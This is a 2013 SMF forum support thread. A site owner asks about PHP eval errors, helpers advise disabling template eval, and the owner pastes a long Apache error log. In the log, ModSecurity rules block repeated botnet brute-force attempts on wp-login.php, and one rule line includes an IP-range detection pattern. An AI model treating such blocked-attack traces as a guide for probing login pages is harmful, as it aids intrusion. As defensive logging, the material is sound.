error codes at the bottom of the SMF forum page

Started by goodbyelyme, October 31, 2013, 08:43:08 AM

Previous topic - Next topic

goodbyelyme

I'm seeing this at the bottom of my SMF pages:

Parse error: syntax error, unexpected ')' in /home/content/t/w/o/twofrogscenter/html/goodbyelyme/forums/Sources/Load.php(2151) : eval()'d code(358) : runtime-created function on line 1

Fatal error: Function name must be a string in /home/content/t/w/o/twofrogscenter/html/goodbyelyme/forums/Sources/Load.php(2151) : eval()'d code on line 358

What do I need to do about it?

Burke ♞ Knight


Are you using the latest version of SMF?
Any Mods installed?
Are you using a custom theme?
Any errors in the error logs? Apache, PHP, SMF?


Chalky

Go into Admin > Configuration > Server Settings and Disable evaluation of templates.  Then you should see the real error instead of the eval which masks it.

goodbyelyme

version 2.0.6

No mods
I'm using one of the themes that came with the install

http://goodbyelyme.com/images/forum2013/goodbyelyme_forum_theme.gif [nofollow]

I get an error when trying to log in as an administrator, so I need another way to check the error logs

"Session verification failed. Please try logging out and back in again, and then try again."


goodbyelyme

How do I check SMF server error logs?

I don't see any reference to them here:

http://wiki.simplemachines.org/smf/Logs

shadow82x

#6
Server logs are found within your hosting control panel (such as cPanel.) The SMF error log is something separate.


In addition to checking your logs, I'd recommend disabling template eval by going into phpMyAdmin (which is also found in your hosting control panel) since you cant access the admin panel.  Within phpMyAdmin try running the following query: REPLACE INTO smf_settings VALUES ('disableTemplateEval', 1); This should reveal what kind of error we're dealing with.

Also, this kind of thing just doesn't happen either, what changes have you made recently?

Edit - Typo, thanks Shambles
Colin B
Former Spammer, Customize, & Support Team Member

Shambles

REPLACE INTO smf_settings VALUES ('disableTemplateEval', 1);

That might be a better setting ;)

Illori

Quote from: Shambles on November 03, 2013, 04:08:27 PM
REPLACE INTO smf_settings VALUES ('disableTemplateEval', 1);

That might be a better setting ;)

you dont need to do a query, just disable template eval on the server settings page in admin

shadow82x

Quote from: Illori on November 03, 2013, 04:36:38 PM
Quote from: Shambles on November 03, 2013, 04:08:27 PM
REPLACE INTO smf_settings VALUES ('disableTemplateEval', 1);

That might be a better setting ;)

you dont need to do a query, just disable template eval on the server settings page in admin
The user wasn't able to access the admin panel/server page.
Colin B
Former Spammer, Customize, & Support Team Member

Illori

depending on the error source changing to another theme via ?theme=2 may allow changing of that setting

goodbyelyme

#11
Here are the error codes from the error log

[Mon Nov 04 08:01:29 2013] [error] [client 199.30.20.56] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/robots.txt
[Mon Nov 04 08:01:29 2013] [error] [client 199.30.20.56] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/missing.html
[Mon Nov 04 08:01:58 2013] [error] [client 79.143.191.44] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Une25king5EAAFOXNwEAAACY"]
[Mon Nov 04 08:01:59 2013] [error] [client 63.247.81.130] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Une250ing5EAAHQhXgsAAAE-"]
[Mon Nov 04 08:02:01 2013] [error] [client 216.107.128.108] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Une26Uing5EAAEWwBFEAAABv"]
[Mon Nov 04 08:10:21 2013] [error] [client 157.55.33.109] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 08:19:48 2013] [error] [client 209.237.142.113] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Une7FEing5EAADfnTDYAAAD6"]
[Mon Nov 04 08:19:50 2013] [error] [client 199.16.131.122] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Une7Fking5EAADekMTwAAACM"]
[Mon Nov 04 08:19:58 2013] [error] [client 64.37.52.152] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Une7Hking5EAAHO2PCQAAACE"]
[Mon Nov 04 08:39:09 2013] [error] [client 66.249.66.198] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 09:04:09 2013] [error] [client 208.115.111.66] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 09:09:08 2013] [error] [client 65.182.188.194] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnfGpEing5EAADfdSbAAAADo"]
[Mon Nov 04 09:09:08 2013] [error] [client 216.245.204.210] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnfGpEing5EAAGZZ4xgAAABo"]
[Mon Nov 04 09:09:09 2013] [error] [client 95.211.180.206] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnfGpUing5EAADvufN8AAACj"]
[Mon Nov 04 09:40:45 2013] [error] [client 204.15.14.220] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnfODUing5EAAHsaVu0AAAAV"]
[Mon Nov 04 09:40:46 2013] [error] [client 108.165.20.162] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnfODking5EAAEfzLBcAAABM"]
[Mon Nov 04 09:40:47 2013] [error] [client 217.19.14.222] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnfOD0ing5EAAFw12RkAAAD2"]
[Mon Nov 04 10:35:14 2013] [error] [client 65.55.24.239] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 11:02:16 2013] [error] [client 69.73.175.234] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnfhKEing5EAACH0ukMAAAGf"]
[Mon Nov 04 11:02:17 2013] [error] [client 69.73.191.164] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnfhKUing5EAACITxhcAAAHP"]
[Mon Nov 04 11:02:19 2013] [error] [client 85.214.27.40] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnfhK0ing5EAACICv9gAAAG@"]
[Mon Nov 04 12:17:43 2013] [error] [client 199.124.61.3] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unfy10ing5EAAGLgR2MAAAEc"]
[Mon Nov 04 12:17:46 2013] [error] [client 180.214.34.73] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unfy2king5EAAGLqS4oAAAEl"]
[Mon Nov 04 12:17:48 2013] [error] [client 85.112.29.210] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unfy3Eing5EAAGfLYoIAAAAn"]
[Mon Nov 04 12:21:24 2013] [error] [client 157.55.35.45] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 12:33:31 2013] [error] [client 180.214.34.73] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unf2i0ing5EAACUT4d8AAAAr"]
[Mon Nov 04 12:33:33 2013] [error] [client 85.214.27.40] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unf2jUing5EAABLPB58AAAAZ"]
[Mon Nov 04 12:33:35 2013] [error] [client 108.165.20.162] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unf2j0ing5EAAAE1tSsAAAD5"]
[Mon Nov 04 12:56:57 2013] [error] [client 217.69.133.238] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 13:17:49 2013] [error] [client 184.60.96.202] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon-precomposed.png
[Mon Nov 04 13:17:49 2013] [error] [client 184.60.96.202] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon.png
[Mon Nov 04 13:19:49 2013] [error] [client 67.228.183.134] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UngBZUing5EAACYlAQ0AAABG"]
[Mon Nov 04 13:19:51 2013] [error] [client 222.255.29.39] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UngBZ0ing5EAACYxAzkAAABK"]
[Mon Nov 04 13:19:53 2013] [error] [client 188.65.217.195] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UngBaUing5EAAGqy2NUAAAEu"]
[Mon Nov 04 13:52:14 2013] [error] [client 66.249.66.81] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 13:52:29 2013] [error] [client 216.246.7.21] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UngJDUing5EAACHnd8kAAAAK"]
[Mon Nov 04 13:52:31 2013] [error] [client 198.57.228.58] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UngJD0ing5EAAExER-kAAAAu"]
[Mon Nov 04 13:52:33 2013] [error] [client 95.211.180.206] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UngJEUing5EAAEnZifgAAABB"]
[Mon Nov 04 14:20:31 2013] [error] [client 157.55.33.126] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 15:10:03 2013] [error] [client 208.115.113.83] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 15:14:19 2013] [error] [client 207.210.192.80] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UngcO0ing5EAADJOOo0AAAB0"]
[Mon Nov 04 15:14:21 2013] [error] [client 184.168.109.23] ModSecurity: Access denied with connection close (phase 1). Pattern match "^(64\\\\.202\\\\.1(6[89]|7\\\\d|8\\\\d|9[01])|103\\\\.1\\\\.17[2-5]|118\\\\.139\\\\.1([6-8]\\\\d|9[01])|146\\\\.255\\\\.(3[2-9]|4[0-7])|160\\\\.153|166\\\\.62\\\\.(\\\\d|\\\\d\\\\d|1[0-2][0-7])|173\\\\.201|182\\\\.50\\\\.(12[89]|1[0-5]\\\\d])|184\\\\.168\\\\.(?!224\\\\.(117|131))|185\\\\.7\\\\.2(4[89]|5 ..." at REMOTE_ADDR. [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_04_wordpress_brute_force_and_bot_posts.conf"] [line "11"] [id "10410"] [msg "Godaddy IP Space wp-login.php attempt"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UngcPUing5EAAH07W6wAAADc"]
[Mon Nov 04 15:33:52 2013] [error] [client 74.95.0.186] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 15:33:53 2013] [error] [client 74.95.0.186] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/whoiserve.html
[Mon Nov 04 15:40:04 2013] [error] [client 66.249.66.114] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/robots.txt
[Mon Nov 04 15:40:04 2013] [error] [client 66.249.66.114] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/missing.html
[Mon Nov 04 15:42:10 2013] [error] [client 74.95.0.186] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/lyme_research.html
[Mon Nov 04 16:08:57 2013] [error] [client 65.55.213.67] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 16:37:39 2013] [error] [client 206.191.49.18] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Ungvw0ing5EAAEvJNRwAAAEH"]
[Mon Nov 04 16:37:40 2013] [error] [client 108.59.252.133] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UngvxEing5EAAAscDZEAAAFr"]
[Mon Nov 04 16:37:43 2013] [error] [client 94.23.232.69] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Ungvx0ing5EAAC4rDMIAAAE0"]
[Mon Nov 04 16:53:40 2013] [error] [client 107.21.95.95] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UngzhEing5EAAC4Zh3sAAABF"]
[Mon Nov 04 16:53:41 2013] [error] [client 207.58.178.177] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UngzhUing5EAAGMH2ZkAAADq"]
[Mon Nov 04 17:01:41 2013] [error] [client 208.115.111.66] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 17:32:41 2013] [error] [client 60.12.119.200] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Ung8qUing5EAAEQk1m0AAAB5"]
[Mon Nov 04 17:32:43 2013] [error] [client 66.55.88.37] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Ung8q0ing5EAADUOiMoAAAAh"]
[Mon Nov 04 17:32:44 2013] [error] [client 198.101.197.182] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Ung8rEing5EAAES76VEAAAE-"]
[Mon Nov 04 17:46:05 2013] [error] [client 66.249.66.114] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/robots.txt
[Mon Nov 04 17:46:05 2013] [error] [client 66.249.66.114] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/healingfoodaddiction/missing.html
[Mon Nov 04 18:07:25 2013] [error] [client 54.228.244.215] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnhEzUing5EAAAL3iJkAAACn"]
[Mon Nov 04 18:07:26 2013] [error] [client 204.15.14.220] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnhEzking5EAADT5iEkAAAAE"]
[Mon Nov 04 18:07:27 2013] [error] [client 109.203.102.150] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnhEz0ing5EAAESM3DYAAADn"]
[Mon Nov 04 18:17:19 2013] [error] [client 206.217.20.156] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/index.htl
[Mon Nov 04 18:22:58 2013] [error] [client 206.217.20.156] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon-precomposed.png
[Mon Nov 04 18:22:59 2013] [error] [client 206.217.20.156] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon.png
[Mon Nov 04 18:58:41 2013] [error] [client 66.249.75.198] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 19:30:25 2013] [error] [client 81.93.152.94] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnhYQUing5EAAC@xQsAAAAEt"]
[Mon Nov 04 19:30:27 2013] [error] [client 112.137.167.158] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnhYQ0ing5EAAGDxEcAAAAAB"]
[Mon Nov 04 19:30:30 2013] [error] [client 110.4.45.47] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnhYRking5EAAArYtJwAAAA5"]
[Mon Nov 04 20:08:34 2013] [error] [client 199.21.99.88] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 20:43:20 2013] [error] [client 217.69.133.235] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 20:43:22 2013] [error] [client 217.69.133.238] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/lyme_research.html
[Mon Nov 04 20:43:35 2013] [error] [client 157.55.35.77] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 20:46:37 2013] [error] [client 166.137.191.45] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon-114x114-precomposed.png
[Mon Nov 04 20:46:37 2013] [error] [client 166.137.191.45] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon-114x114.png
[Mon Nov 04 20:46:37 2013] [error] [client 166.137.191.45] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon-precomposed.png
[Mon Nov 04 20:46:38 2013] [error] [client 166.137.191.45] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/apple-touch-icon.png
[Mon Nov 04 20:57:42 2013] [error] [client 66.249.75.198] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 20:58:53 2013] [error] [client 207.241.237.108] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 20:59:50 2013] [error] [client 178.21.17.153] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnhtNking5EAACdIGYgAAAA7"]
[Mon Nov 04 20:59:52 2013] [error] [client 217.19.14.222] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnhtOEing5EAADEvW1oAAAAz"]
[Mon Nov 04 20:59:53 2013] [error] [client 199.59.92.19] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnhtOUing5EAABLw014AAAAJ"]
[Mon Nov 04 21:07:12 2013] [error] [client 157.55.33.45] File does not exist: /var/chroot/home/content/t/w/o/twofrogscenter/html/robots.txt
[Mon Nov 04 21:18:17 2013] [error] [client 67.231.20.80] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UnhxiUing5EAAGuwDKMAAAAg"]
[Mon Nov 04 21:18:18 2013] [error] [client 64.34.198.142] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Bot detected! Known Botnet Template"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unhxiking5EAAFU7e-cAAABL"]
[Mon Nov 04 21:18:19 2013] [error] [client 184.168.109.23] ModSecurity: Access denied with connection close (phase 1). Pattern match "^(64\\\\.202\\\\.1(6[89]|7\\\\d|8\\\\d|9[01])|103\\\\.1\\\\.17[2-5]|118\\\\.139\\\\.1([6-8]\\\\d|9[01])|146\\\\.255\\\\.(3[2-9]|4[0-7])|160\\\\.153|166\\\\.62\\\\.(\\\\d|\\\\d\\\\d|1[0-2][0-7])|173\\\\.201|182\\\\.50\\\\.(12[89]|1[0-5]\\\\d])|184\\\\.168\\\\.(?!224\\\\.(117|131))|185\\\\.7\\\\.2(4[89]|5 ..." at REMOTE_ADDR. [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_04_wordpress_brute_force_and_bot_posts.conf"] [line "11"] [id "10410"] [msg "Godaddy IP Space wp-login.php attempt"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unhxi0ing5EAADoQd08AAADD"]
[Mon Nov 04 21:53:46 2013] [error] [client 87.253.162.6] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unh52king5EAADBjdXUAAAAa"]
[Mon Nov 04 21:53:48 2013] [error] [client 81.93.152.94] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "Unh53Eing5EAAGreeDIAAAES"]
[Mon Nov 04 22:27:07 2013] [error] [client 207.58.145.189] ModSecurity: Access denied with connection close (phase 2). 1 [file "/web/httpd2/modsecurity.d/activated_rules/modsecurity_gd_07_post_guardian.conf"] [line "14"] [id "10701"] [msg "BLOCKED - Known Template(cached)"] [hostname "goodbyelyme.com"] [uri "/wp-login.php"] [unique_id "UniBq0ing5EAAGMjG7AAAAAX"]
